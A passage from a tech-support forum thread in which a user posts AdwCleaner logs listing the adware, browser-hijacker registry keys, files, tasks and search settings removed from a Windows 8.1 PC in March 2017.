    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKCU\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKCU\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [ArcherGroupEx]
    [-] Key deleted: HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinZipper
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubedZLGroupEx]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubZLGroEx]
    [-] Key deleted: HKCU\SOFTWARE\Classes\ChromeHTML
    [-] Key deleted: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
    [-] Value deleted: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [-] Key deleted: HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej


    ***** [ Web browsers ] *****

    [-] Firefox fake profile cleaned: Profile1
    [-] Firefox preferences cleaned: "browser.search.defaultenginename" - "nice"
    [-] Firefox preferences cleaned: "browser.search.order.1" - "nice"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.search.selectedEngine" - "nice"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: go search
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: omniboxes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.delta-homes.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: palikan.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ljibkigjccbegnbeojkoafejpoiachej
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: noajmlkipclmeolfcnflkjhijkigpfjh
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxp://www.palikan.com/?f=1&a=plk_dstndrm_15_51&cd=2XzuyEtN2Y1L1Qzu0A0C0DtC0BzzyE0BtD0F0AtD0FtAtC0EtN0D0Tzu0StCyEyEyCtN1L2XzutAtFtCyDtFtAtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyD0EyBzyyDtCtDtCtGyCyE0FzytG0AyEzzyEtGtB0AzztCtGtDyByCzyyCtA0AtAzz0BtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0AzyzytDyD0CtAtG0Azz0CzztGyEtC0C0AtG0BzzyBtCtGtBtCtAyByE0CtDzy0F0ByE0A2QtN0A0LzuyE&cr=513584365&ir=


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [24497 Bytes] - [15/03/2017 14:04:22]
    C:\AdwCleaner\AdwCleaner[S0].txt - [35461 Bytes] - [15/03/2017 13:04:57]
    C:\AdwCleaner\AdwCleaner[S1].txt - [35272 Bytes] - [15/03/2017 13:16:56]
    C:\AdwCleaner\AdwCleaner[S2].txt - [32837 Bytes] - [15/03/2017 14:00:26]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [24793 Bytes] ##########
     
  13. 2017/03/15
    scgoh123 Well-Known Member Thread Starter

    # AdwCleaner v6.044 - Logfile created 15/03/2017 at 14:04:22
    # Updated on 28/02/2017 by Malwarebytes
    # Database : 2017-03-15.1 [Local]
    # Operating System : Windows 8.1 Single Language (X64)
    # Username : User - ASUS
    # Running from : F:\AdwCleaner.exe
    # Mode: Clean
    # Support : Customer Support & Help Center



    ***** [ Services ] *****



    ***** [ Folders ] *****

    [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent
    [-] Folder deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default


    ***** [ Files ] *****

    [-] File deleted: C:\Windows\SysNative\log\iSafeKrnlCall.log
    [-] File deleted: C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
    [-] File deleted: C:\Program Files (x86)\settings.dat
    [-] File deleted: C:\Users\Public\Documents\cfg.ini
    [-] File deleted: C:\Users\Public\Documents\cc.ini
    [-] File deleted: C:\Users\Public\Documents\temp.dat
    [-] File deleted: C:\Users\Public\Documents\report.dat
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\palikan.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\nice.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\nice.xml
    [-] File deleted: C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\mylucky123.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\searchplugins\searchinme.xml
    [#] File deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default\SEARCHPLUGINS\searchinme.xml


    ***** [ DLL ] *****



    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****

    [-] Shortcut disinfected: C:\Users\Public\Desktop\Google Chrome.lnk
    [-] Shortcut disinfected: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\f73cfe270e0a8f33\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\c5ecd897b04d4fe6\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\b216584368a76cee\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\513998e1b006ffdf\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\4f572ee5bdaa3aca\Google Chrome.lnk
    [-] Shortcut disinfected: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\276bc18f565c8259\Google Chrome.lnk


    ***** [ Scheduled Tasks ] *****

    [-] Task deleted: Milimili
    [-] Task deleted: BikaQ_FetchAndUpgrade_CanBeDel


    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.001
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.7z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.arj
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.bzip2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cab
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.cpio
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.deb
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.dmg
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.fat
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.gzip
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.hfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.iso
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lha
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzh
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.lzma
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.ntfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.rpm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.squashfs
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.swm
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.taz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tbz2
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tgz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.tpz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.txz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.vhd
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.wim
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xar
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.xz
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.z
    [-] Key deleted: HKLM\SOFTWARE\Classes\WinZippers.zip
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\qkseeService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\WinSnare
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\iedvutils
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [-] Key deleted: HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [-] Key deleted: HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\OCComSDK.ComSDK.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDecoWizardPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshDoctorPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshManipulationPage.24
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshPrepCompPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshRelaxPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSmoothPage_c.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\SWNGRE.uiMeshSplitPage_c.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{F83D1872-D9FF-47F8-B5A0-49CC51E24EE8}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B9D64D3B-BE75-4FA2-B94A-C4AE772A0146}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{FA7B2795-C0C8-4A58-8672-3F8D80CC0270}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{1112F282-7099-4624-A439-DB29D6551552}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{BA32987D-DB80-4CCB-A8BB-F812B5421C0F}
    [-] Key deleted: HKU\.DEFAULT\Software\ompndb
    [-] Key deleted: HKU\.DEFAULT\Software\jhdbca
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\PRODUCTSETUP
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\ompndb
    [#] Key deleted on reboot: HKU\S-1-5-18\Software\jhdbca
    [#] Key deleted on reboot: HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: HKCU\Software\PRODUCTSETUP
    [-] Key deleted: HKLM\SOFTWARE\Elex-tech
    [-] Key deleted: HKLM\SOFTWARE\hdcode
    [-] Key deleted: HKLM\SOFTWARE\trotuxSoftware
    [-] Key deleted: HKLM\SOFTWARE\ScreenShot
    [-] Key deleted: HKLM\SOFTWARE\WinZiper
    [-] Key deleted: HKLM\SOFTWARE\WinSaberSvc
    [-] Key deleted: HKLM\SOFTWARE\ompndb
    [-] Key deleted: HKLM\SOFTWARE\jhdbca
    [-] Key deleted: HKLM\SOFTWARE\InterHop
    [-] Key deleted: HKLM\SOFTWARE\WinArcher
    [-] Key deleted: HKLM\SOFTWARE\amule-custom
    [-] Key deleted: HKLM\SOFTWARE\mylucky123Software
    [-] Key deleted: HKLM\SOFTWARE\amisitesSoftware
    [-] Key deleted: HKLM\SOFTWARE\startpageing123Software
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\iSafe
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A0275D4F-FFAB-4A42-9874-B871B1C4CA3D}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{19539992-061C-4E8B-9053-07B175303AF4}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{418DDAC3-E16C-47C2-B5FE-4FBCAB0E10D0}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63}
    [-] Key deleted: HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [#] Key deleted on reboot: [x64] HKCU\Software\ICSW1.17
    [#] Key deleted on reboot: [x64] HKCU\Software\PRODUCTSETUP
    [-] Key deleted: [x64] HKLM\SOFTWARE\ompndb
    [-] Key deleted: [x64] HKLM\SOFTWARE\jhdbca
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\CLIENTS\Corner Sunshine
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-3023424667-1579791547-2771295078-1001\Products\3CADD814C61E2C745BEFF4CBBAE0010D
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\29993591C160B8E40935701B5703A34F
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A82B2B65366E82D4483A836460A8D736
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\FFA0118CE95AE0D70F14E7E8A72452C8
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\29993591C160B8E40935701B5703A34F
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Features\A82B2B65366E82D4483A836460A8D736
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\F4D5720ABAFF24A489478B171B4CACD3
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\Products\A82B2B65366E82D4483A836460A8D736
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Search Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Search_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Default_Page_URL]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Search Page]
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
